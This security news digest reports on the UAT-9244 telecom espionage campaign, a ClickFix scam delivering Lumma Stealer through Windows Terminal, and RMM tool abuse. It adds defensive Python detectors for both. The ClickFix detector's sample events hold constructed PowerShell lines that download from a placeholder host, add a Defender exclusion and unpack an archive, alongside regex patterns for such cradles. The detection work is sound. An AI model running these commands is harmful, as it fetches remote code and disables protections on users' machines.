Trending Topics
China-Linked APT UAT-9244 Breaches South American Telecoms with a Malware Campaign
A China-linked threat group tracked as UAT-9244 is aggressively targeting telecommunications providers across South America with a malware toolkit built for persistence, espionage, and stealth. Active since 2024, the group is believed to share operational patterns with espionage outfits such as FamousSparrow and Tropic Trooper, according to new research from Cisco Talos. UAT-9244 employs a three-pronged attack strategy with both Windows and Linux implants to compromise endpoints and network edge devices. The first tool, TernDoor, is delivered by DLL side-loading: a seemingly harmless executable, “wsprint[.]exe,” loads the malicious library, which decrypts and launches the payload. TernDoor then provides remote command execution, file management, and system reconnaissance while disabling security defenses, and a built-in uninstall switch (“-u”) lets the operators erase evidence with a single command. The second component, PeerTime (also called “angrypeer”), is a Linux backdoor that leverages the BitTorrent protocol to communicate with C2 infrastructure and share payloads among infected peers, and that propagates using BusyBox utilities. The third, BruteEntry, is a Go-based brute-force scanner deployed on compromised network devices, turning them into relay nodes that perform large-scale SSH, Postgres, and Tomcat scans to find further footholds. On Windows systems, persistence is achieved through hidden scheduled tasks and modified registry keys. Together, these tools form a resilient attack chain that lets UAT-9244 infiltrate, expand within, and maintain access to critical telecom networks, a clear signal of escalating state-sponsored cyber operations against global communications infrastructure.
ClickFix Scam Evolves: Attackers Hijack Windows Terminal to Deploy Lumma Stealer
A new evolution of the long-running ClickFix scam manipulates Windows users into opening Windows Terminal and pasting malicious commands themselves, handing control to the Lumma Stealer malware. According to Microsoft Threat Intelligence, this campaign, active since February, changes the traditional ClickFix technique: where earlier lures relied on the Win + R “Run” dialog, the new ones instruct victims to press Win + X and then I, which opens Windows Terminal from the Quick Link menu, sidestepping detections tuned to the older Run-dialog pattern. The scam lures victims through fake verification pages or CAPTCHA prompts that tell them to copy and paste a seemingly harmless command for troubleshooting or connection checks. In reality, the encoded command launches a multi-step PowerShell script that downloads a disguised 7-Zip utility, extracts malicious components, disables Microsoft Defender protections, and installs Lumma Stealer to harvest login credentials from Chrome and Edge. A secondary version of the campaign drops a VBScript payload that is executed via native Windows tools such as MSBuild and retrieves content from blockchain infrastructure (the tactic known as EtherHiding) before running the same credential theft routine. The enduring success of ClickFix lies in simple human deception: the user runs the infection chain with their own hands and privileges. Microsoft’s report highlights how the attackers adapt the old formula to exploit trust in legitimate tools, betting that most people will not question commands executed inside Windows Terminal.
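The chain above leaves a distinctive trace in process-creation telemetry: a PowerShell process whose ancestry includes an interactive host the user controls (Windows Terminal for the Win + X, I variant, explorer.exe for the Win + R variant), carrying an encoded command that decodes to a download cradle, a Defender-exclusion call, and an archive extraction. The following is an added example, not Microsoft's detection logic or code from the report: it decodes -EncodedCommand arguments (base64 over UTF-16LE), scores the command against indicators drawn from the behaviour described above, and triages a few constructed Sysmon-style events. The indicator patterns, event format, paths and hostnames are my own assumptions.

```python
import base64
import re

# Added example (not Microsoft's detection logic). Patterns, event format and sample
# events are constructed for illustration.
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
# Ancestors that mean a human typed or pasted the command: Windows Terminal (Win+X, I),
# or explorer.exe, which spawns whatever the Win+R Run dialog launches.
INTERACTIVE_HOSTS = {"windowsterminal.exe", "explorer.exe"}
# powershell.exe accepts prefix abbreviations, so -e, -ec, -enc and -EncodedCommand all work.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b"),
    "defender_tamper": re.compile(
        r"(?i)\b(?:add|set)-mppreference\b.*?-(?:exclusion(?:path|process|extension)"
        r"|disablerealtimemonitoring|disableioavprotection)"),
    "archive_extract": re.compile(r"(?i)\b7za?(?:\.exe)?\b\s+[xe]\b|\bexpand-archive\b"),
    "lolbin_exec": re.compile(r"(?i)\b(?:msbuild|mshta|wscript|cscript)(?:\.exe)?\b"),
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event; returns None for non-PowerShell images."""
    if basename(event["image"]) not in PS_HOSTS:
        return None
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] if decoded is None else event["cmdline"] + "\n" + decoded
    interactive = [p for p in map(basename, event["parent_chain"]) if p in INTERACTIVE_HOSTS]
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # A cradle or tamper step issued from an interactive shell is the ClickFix signature;
    # without an interactive ancestor, require two indicators before paging anyone.
    flagged = bool(hits) and (bool(interactive) or len(hits) >= 2)
    return {"flagged": flagged, "encoded": decoded is not None,
            "interactive_host": interactive, "indicators": hits, "decoded": decoded}


def triage(events):
    """Return the ids of flagged events, in input order."""
    out = []
    for e in events:
        r = analyze_event(e)
        if r and r["flagged"]:
            out.append(e["id"])
    return out


# Constructed sample telemetry (Sysmon event-1 style); paths and URL are placeholders.
STAGE_TWO = (r"$u='http://example.invalid/7z.exe'; iwr $u -OutFile $env:TEMP\7z.exe; "
             r"Add-MpPreference -ExclusionPath $env:TEMP; "
             r"& $env:TEMP\7z.exe x $env:TEMP\pkg.7z -o$env:TEMP\out")
TERMINAL = r"C:\Program Files\WindowsApps\WindowsTerminal\WindowsTerminal.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "benign-interactive", "image": POWERSHELL, "parent_chain": [TERMINAL],
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"id": "clickfix-terminal", "image": POWERSHELL, "parent_chain": [POWERSHELL, TERMINAL],
     "cmdline": "powershell.exe -w hidden -ep bypass -enc " + encode_ps(STAGE_TWO)},
    {"id": "scheduled-script", "image": POWERSHELL,
     "parent_chain": [r"C:\Windows\System32\svchost.exe"],
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"id": "cradle-from-service", "image": POWERSHELL,
     "parent_chain": [r"C:\Windows\System32\services.exe"],
     "cmdline": 'powershell.exe -c "iwr http://example.invalid/a.7z -OutFile a.7z; 7z.exe x a.7z"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        res = analyze_event(ev)
        print(ev["id"], "FLAGGED" if res["flagged"] else "ok", res["indicators"])
```

Decoding the argument before matching matters: the indicators never appear in the raw command line of the encoded variant, so a rule that only inspects the visible string sees nothing but base64. The parent-chain check is what distinguishes the ClickFix case from the same cradle run by a scheduled task or service, which still deserves attention but is a different investigation.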
Weaponizing Trust: The Rise of RMM Abuse in Modern Cyber Attacks
Cybercriminals are increasingly exploiting trusted RMM tools to evade detection, maintain persistence, and execute attacks under the guise of legitimate IT activity. By embedding themselves within trusted administrative software, attackers gain hands-on-keyboard access that often slips past EDR controls. The Huntress 2026 Cyber Threat Report reveals a 277% surge in RMM abuse in 2025, underscoring how adversaries now favor convenience over building custom malware. Most compromises begin with social engineering: phishing emails impersonating e-signature requests, invoices, or voicemail alerts that trick users into installing malicious RMM agents. Once inside, attackers can automate tasks, move laterally, and launch ransomware in under an hour, especially when targeting Managed Service Providers to reach multiple downstream clients in a single supply chain attack. Defending against this trend demands behavioral monitoring rather than blind trust in approved software: security teams must baseline normal activity, flag unusual script execution, and enforce strict allowlists for authorized remote tools. Fingerprinting known RMM executables, verifying the endpoints they connect to, and treating unrecognized remote sessions as potential intrusions are essential; an approved product reaching an unapproved server is still an intrusion. Beyond technology, cultivating a vigilant workforce through ongoing security awareness training remains critical: employees who report suspicious activity can halt an attack before it evolves from infiltration to impact.
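The allowlist and endpoint-verification advice above can be turned into a concrete check over process and connection telemetry. The following is an added example, not code or data from the Huntress report: it fingerprints RMM agents by image name, compares each one against a hypothetical organisation policy (which products are approved, where they may run from, which servers they may reach), and flags agents launched from mail or browser processes, the delivery pattern the phishing lures above produce. The fingerprint catalogue, the policy, the hostnames and the sample events are illustrative assumptions.

```python
# Added example (not from the Huntress report). Catalogue, policy and sample events are
# illustrative assumptions, not a real organisation's configuration.

# Fingerprint catalogue: agent image name -> product. A production version would also
# carry the vendor's code-signing subject and known file hashes.
KNOWN_RMM_BINARIES = {
    "screenconnect.clientservice.exe": "ScreenConnect",
    "anydesk.exe": "AnyDesk",
    "teamviewer.exe": "TeamViewer",
    "ateraagent.exe": "Atera",
}

# Hypothetical policy: the only approved product, where it may run from, and what it may
# talk to. An approved binary reaching any other server (e.g. an attacker's own
# ScreenConnect instance) is treated as an intrusion; the binary alone proves nothing.
APPROVED_RMM = {
    "ScreenConnect": {
        "install_roots": ("c:\\program files\\", "c:\\program files (x86)\\"),
        "endpoints": {"control.example.com"},
    },
}

# Parents that indicate a user launched the agent from mail, a browser or a document
# rather than the deployment pipeline installing it.
USER_FACING_PARENTS = {"outlook.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "winword.exe", "excel.exe", "acrord32.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def endpoint_allowed(host, endpoints):
    """Exact match or subdomain of an approved endpoint; suffix tricks do not pass."""
    return any(host == e or host.endswith("." + e) for e in endpoints)


def assess(event):
    """Return None if the image is not a fingerprinted RMM agent, else a verdict dict."""
    product = KNOWN_RMM_BINARIES.get(basename(event["image"]))
    if product is None:
        return None
    findings = []
    policy = APPROVED_RMM.get(product)
    if policy is None:
        findings.append(f"{product} is not an approved RMM product")
    else:
        if not event["image"].lower().startswith(policy["install_roots"]):
            findings.append("approved RMM running outside its sanctioned install root")
        host = event.get("dest_host")
        if host and not endpoint_allowed(host, policy["endpoints"]):
            findings.append(
                f"approved RMM connecting to unexpected endpoint {host}:{event['dest_port']}")
    if basename(event["parent"]) in USER_FACING_PARENTS:
        findings.append("launched from a user-facing application (phishing delivery pattern)")
    return {"product": product, "findings": findings,
            "verdict": "investigate" if findings else "expected"}


def flagged_ids(events):
    return [e["id"] for e in events if (assess(e) or {}).get("findings")]


# Constructed sample events (image, parent, outbound destination); not real telemetry.
SAMPLE_EVENTS = [
    {"id": "approved",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)\ScreenConnect.ClientService.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "dest_host": "control.example.com", "dest_port": 443},
    {"id": "rogue-instance",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (d4e5f6)\ScreenConnect.ClientService.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "dest_host": "relay.example.net", "dest_port": 8041},
    {"id": "phished-anydesk",
     "image": r"C:\Users\alice\AppData\Roaming\AnyDesk\AnyDesk.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dest_host": "relay.example.org", "dest_port": 443},
    {"id": "not-rmm", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "dest_host": None, "dest_port": None},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        res = assess(ev)
        if res:
            print(ev["id"], res["verdict"], res["findings"])
```

The "rogue-instance" case is the one most teams miss: the image is the approved product in its normal install location, and only the destination host reveals that it is enrolled in someone else's server. That is why endpoint verification belongs in the allowlist rather than being left to the firewall's default-allow for "known good" software.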
Top CVEs of the Week
As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.